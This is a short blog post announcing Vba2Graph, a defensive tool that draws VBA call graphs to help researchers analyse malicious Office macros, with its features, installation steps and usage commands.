Thursday, 30 August 2018
0 comments

Vba2Graph- A Tool For Security Researchers For Malware Analysis

Vba2Graph- A Tool For Security Researchers For Malware Analysis

Vba2Graph: A tool for security researchers to Analysis of Malware.

Allows for quick analysis of malicious macros, and easy understanding of the execution flow.

It Generates a VBA call graph for easier analysis of malicious documents., developed by @MalwareCantFly

Features


  • Keyword highlighting
  • VBA Properties support
  • External function declarion support
  • Tricky macros with "_Change" execution triggers
  • Fancy color schemes

Pros

    ✓ Pretty fast

    ✓ Works well on most malicious macros observed in the wild


Cons

    ✗ Static (dynamicaly resolved calls would not be recognized)

Examples

Example 1:

Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.


Example 2:



Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip install -r requirements.txt

Install Graphviz

For Windows
Install Graphviz msi:

https://graphviz.gitlab.io/_pages/Download/Download_windows.html

Add "dot.exe" to PATH env variable or just:

set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

For Mac
brew install graphviz

Ubuntu
sudo apt-get install graphviz

Arch
sudo pacman -S graphviz

Usage (All Platforms)

olevba malicious.doc | python vba2graph.py -c 1

python vba2graph.py -i olevba_output.bas -o output_folder

Output

You'll get 3 folders in your output folder:

  • png: the actual graph image you are looking for
  • dot: the dot file which was used to create the graph image
  • bas: the VBA functions code that was recognized by the script (for debugging)

Batch Processing

Mac/Linux:
batch.sh script file is attached for running olevba and vba2graph on an input folder of malicious docs.

Deletes output dir. use with caution.


Download Vba2Graph

0 comments:

Post a Comment

 
Toggle Footer
Top